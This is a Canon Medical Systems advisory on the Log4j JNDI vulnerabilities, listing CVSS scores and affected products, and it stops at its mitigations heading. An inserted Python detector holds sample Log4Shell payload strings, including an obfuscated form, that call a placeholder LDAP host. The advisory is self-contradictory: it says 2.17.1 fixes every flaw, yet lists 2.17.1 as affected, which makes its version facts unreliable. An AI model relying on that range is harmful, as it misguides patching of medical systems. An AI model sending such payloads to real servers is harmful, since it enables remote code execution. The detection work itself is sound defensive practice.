Apache Log4j Vulnerability

Canon Medical Systems Security Advisory

Overview:
It was announced that there are security vulnerabilities in Apache Log4j, a Java-based logging library provided by The Apache Software Foundation. On a server running Apache Log4j, a remote attacker could execute arbitrary code by sending specially crafted data that exploits these vulnerabilities.

Vulnerability Overview:
Log4j has a Lookup feature that evaluates certain patterns in logged character strings as variables. Among the Lookups, the JNDI Lookup was found to deserialize and execute Java class information fetched from an external URL or internal path included in the logged string (CWE-20, CVE-2021-44228). As a result, a remote attacker who can get a specially crafted string written to the vulnerable system's log can have arbitrary Java code executed by that system. CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832 were reported after CVE-2021-44228. All of these vulnerabilities were fixed in the latest Log4j version (2.17.1).
The Apache Software Foundation has published the following information:

REF: https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
REF: https://nvd.nist.gov/vuln/detail/CVE-2021-44228

-Base CVSS Score:
 CVE-2021-44228 10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
 CVE-2021-45046 9.0 (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)
 CVE-2021-45105 5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)
 CVE-2021-44832 6.6 (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)
-Versions Affected: all versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.17.1
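The log-based triage step that follows from the description above, as an added example (not Canon Medical's or Apache's code): it normalises the nested lookup forms Log4j would resolve before reaching a JNDI lookup (lower, upper and the default-value form) and reports every line of a log that still carries one, so operators can review access logs of an affected system. The log lines are constructed and the 203.0.113.0/24 addresses are documentation-range placeholders.

```python
"""Triage helper: find Log4j JNDI lookup strings in log lines.
Added example for this advisory, not Canon's or Apache's code; the log lines
are constructed and 203.0.113.0/24 is a documentation-range placeholder."""
import re

_INNER = re.compile(r"\$\{([^${}]*)\}")  # innermost ${...}: no nesting inside
_JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Statically resolve the lookups Log4j evaluates before a JNDI lookup runs.
    Only state-free lookups are resolved (lower, upper, and the ${name:-default}
    fallback form); any other lookup is kept verbatim so the result shows what
    the library would have attempted. Innermost-first, bounded by max_rounds."""
    def resolve(match: re.Match) -> str:
        body = match.group(1)
        if ":-" in body:  # ${env:missing:-x} or ${::-x} -> x
            return body.split(":-", 1)[1]
        name, _, arg = body.partition(":")
        if name.lower() == "lower":
            return arg.lower()
        if name.lower() == "upper":
            return arg.upper()
        # Runtime lookup (jndi, env, ...): wrap in private markers so the next
        # pass does not re-match it; markers are turned back into ${ } below.
        return "\x00" + body + "\x01"
    for _ in range(max_rounds):
        new_text = _INNER.sub(resolve, text)
        if new_text == text:
            break
        text = new_text
    return text.replace("\x00", "${").replace("\x01", "}")


def jndi_lookups(line: str) -> list[str]:
    """Every JNDI lookup in the line, in normalised form (empty if none)."""
    return [m.group(0) for m in _JNDI.finditer(normalize(line))]


def scan_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """(1-based line number, lookups) for each line carrying a JNDI lookup."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := jndi_lookups(line))]


# Constructed access-log lines: a benign request, then two with lookups in the User-Agent.
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Dec/2021:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:10:12:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/x}"',
    '203.0.113.5 - - [10/Dec/2021:10:12:03 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${::-l}dap://203.0.113.5:1389/x}"',
]
```

Running `scan_log(SAMPLE_LOG)` reports lines 2 and 3 with the same normalised lookup; a match is a reason to look for outbound LDAP/RMI connections from the host at that time, not proof of compromise by itself.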

Possibly Affected Canon Medical Systems Products:
The following Canon Medical Systems Corporation products do not use Apache Log4j.

  • CT Medical Imaging Products
  • MR Medical Imaging Products
  • UL Medical Imaging Products
  • XR Medical Imaging Products
  • NM Medical Imaging Products
  • Eye-Care Products
  • Canon DR Products (CXDI_NE) such as Omnera, FlexPro, Soltus
  • VL Infinix-i and Alphenix DFP
  • VL Infinix-i Angio Workstation (AWS)

Canon Medical Products that are affected:
  • Vitrea Advanced 7.x
  • VL Alphenix Angio Workstation (AWS)

Mitigations for affected systems: